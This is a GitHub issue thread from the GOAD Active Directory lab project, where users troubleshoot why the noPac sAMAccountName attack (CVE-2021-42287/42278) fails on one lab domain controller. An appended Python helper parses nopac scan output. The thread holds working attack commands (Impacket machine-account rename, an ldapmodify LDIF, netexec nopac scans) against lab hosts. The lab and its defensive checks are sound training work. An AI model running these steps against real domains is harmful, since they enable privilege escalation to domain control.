Orange-Cyberdefense / GOAD

game of active directory
GNU General Public License v3.0

Patch SamAccountName [CVE-2021-42287] #145

Closed AlgunaPseudo closed 11 months ago

AlgunaPseudo commented 11 months ago

Hi,

It would appear that the SamAccountName vulnerability is no longer exploitable on DC02. I've tried to exploit it with Impacket pull requests (https://github.com/SecureAuthCorp/impacket/pull/1202 and https://github.com/SecureAuthCorp/impacket/pull/1224) and also with ldapmodify and in both cases I get an error 00000523 (https://support.microsoft.com/en-us/topic/kb5008102-active-directory-security-accounts-manager-hardening-changes-cve-2021-42278-5975b463-4c95-45e1-831a-d120004e258e -> make sure sAMAccountName ends with '$').

Via Impacket:

$ python3 renameMachine.py -current-name 'samaccountname$' -new-name 'winterfell' -dc-ip 'winterfell.north.sevenkingdoms.local' north.sevenkingdoms.local/jon.snow:iknownothing
[...]

[*] Modifying attribute (sAMAccountName) of object (CN=samaccountname,CN=Computers,DC=north,DC=sevenkingdoms,DC=local): (samaccountname$) -> (winterfell)
[*] New sAMAccountName does not end with '$' (attempting CVE-2021-42278)
[-] Server probably patched against CVE-2021-42278

Via Ldapsearch:

$ cat modify_samaccountname.ldif
dn: CN=samaccountname,CN=Computers,DC=north,DC=sevenkingdoms,DC=local
changetype: modify
replace: sAMAccountName
sAMAccountName: winterfell

$ ldapmodify -x -H ldap://192.168.10.11 -D "jon.snow@north.sevenkingdoms.local" -w iknownothing -f modify_samaccountname.ldif
modifying entry "CN=samaccountname,CN=Computers,DC=north,DC=sevenkingdoms,DC=local"
ldap_modify: Other (e.g., implementation specific) error (80)
    additional info: 00000523: SysErr: DSID-031A1242, problem 22 (Invalid argument), data 0

Why DC02? Because this is the example used in mayfly277's write-up.

Mayfly277 commented 11 months ago

I just redid the attack path by copy/pasting the commands from my blog and it works well on a fresh install.

Could you try a TGT PAC size test with netexec on your instance?

I'm closing as it seems to be an issue on your side.

AlgunaPseudo commented 11 months ago

Hi Mayfly,

The command output shows me that the PAC cannot be affected by CVE-2021-42278:

$ netexec smb winterfell.north.sevenkingdoms.local -u jon.snow -p iknownothing -d north.sevenkingdoms.local -M nopac
SMB         192.168.10.11   445    WINTERFELL       [*] Windows 10.0 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB         192.168.10.11   445    WINTERFELL       [+] north.sevenkingdoms.local\jon.snow:iknownothing 
NOPAC       192.168.10.11   445    WINTERFELL       TGT with PAC size 1743
NOPAC       192.168.10.11   445    WINTERFELL       TGT without PAC size 1743

I hadn't specified it, but my lab was set up on Proxmox (following your doc). Perhaps there's a difference with the lab set up locally via Vagrant?

Mayfly277 commented 11 months ago

Sad :/, certainly the image you took (or the link I provided) for setting up the lab is more recent and patched. IMO you can try on essos if it works.

AlgunaPseudo commented 11 months ago

Indeed, it works on essos!

$ netexec smb meereen.essos.local -u khal.drogo -p horse -d essos.local -M nopac
SMB         192.168.10.12   445    MEEREEN          [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True)
SMB         192.168.10.12   445    MEEREEN          [+] essos.local\khal.drogo:horse 
NOPAC       192.168.10.12   445    MEEREEN          TGT with PAC size 1465
NOPAC       192.168.10.12   445    MEEREEN          TGT without PAC size 708
NOPAC       192.168.10.12   445    MEEREEN          
NOPAC       192.168.10.12   445    MEEREEN          VULNERABLE
NOPAC       192.168.10.12   445    MEEREEN          Next step: https://github.com/Ridter/noPac

(thank you Microsoft for not patching Windows Server 2016)

Thanks for your feedback
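As an added example (not code from the GOAD project or from either participant), a small Python helper that reads netexec `-M nopac` output like the two runs quoted in this thread and reports which DC still hands out a smaller, PAC-less TGT, plus the trailing-'$' rule behind the 00000523 error shown above. The sample lines are constructed from this thread's output; 0x523 is the standard Windows ERROR_INVALID_ACCOUNT_NAME value.

```python
import re

# Constructed sample: the netexec `-M nopac` lines quoted in this thread.
NETEXEC_OUTPUT = """\
SMB         192.168.10.11   445    WINTERFELL       [+] north.sevenkingdoms.local\\jon.snow:iknownothing
NOPAC       192.168.10.11   445    WINTERFELL       TGT with PAC size 1743
NOPAC       192.168.10.11   445    WINTERFELL       TGT without PAC size 1743
SMB         192.168.10.12   445    MEEREEN          [+] essos.local\\khal.drogo:horse
NOPAC       192.168.10.12   445    MEEREEN          TGT with PAC size 1465
NOPAC       192.168.10.12   445    MEEREEN          TGT without PAC size 708
"""

LINE_RE = re.compile(
    r"^NOPAC\s+(?P<ip>\S+)\s+\d+\s+(?P<host>\S+)\s+"
    r"TGT (?P<kind>with|without) PAC size (?P<size>\d+)$"
)


def parse_pac_sizes(output: str) -> dict:
    """Map each host to its {'with': bytes, 'without': bytes} TGT sizes."""
    sizes = {}
    for line in output.splitlines():
        m = LINE_RE.match(line.strip())
        if m:  # SMB banner and auth lines carry no PAC data, skip them
            sizes.setdefault(m["host"], {})[m["kind"]] = int(m["size"])
    return sizes


def assess_host(sizes: dict) -> str:
    """Reproduce the module's verdict: equal sizes mean the KDC did not
    strip the PAC (patched); a smaller PAC-less TGT means it still does,
    which is what the VULNERABLE line for MEEREEN above reports."""
    if "with" not in sizes or "without" not in sizes:
        return "incomplete"
    return "patched" if sizes["with"] == sizes["without"] else "VULNERABLE"


def assess_all(output: str) -> dict:
    return {host: assess_host(s) for host, s in parse_pac_sizes(output).items()}


ERROR_INVALID_ACCOUNT_NAME = 0x523  # the "00000523" in the ldapmodify error above


def validate_computer_rename(new_name: str, is_computer: bool) -> int:
    """KB5008102 rule as described in this thread: a computer object's
    sAMAccountName must keep its trailing '$', otherwise the DC rejects
    the modify with 0x523. Returns 0 when the rename would be accepted."""
    if is_computer and not new_name.endswith("$"):
        return ERROR_INVALID_ACCOUNT_NAME
    return 0
```

Running `assess_all` over a saved netexec scan of every DC gives a quick per-host patch-state table for an audit.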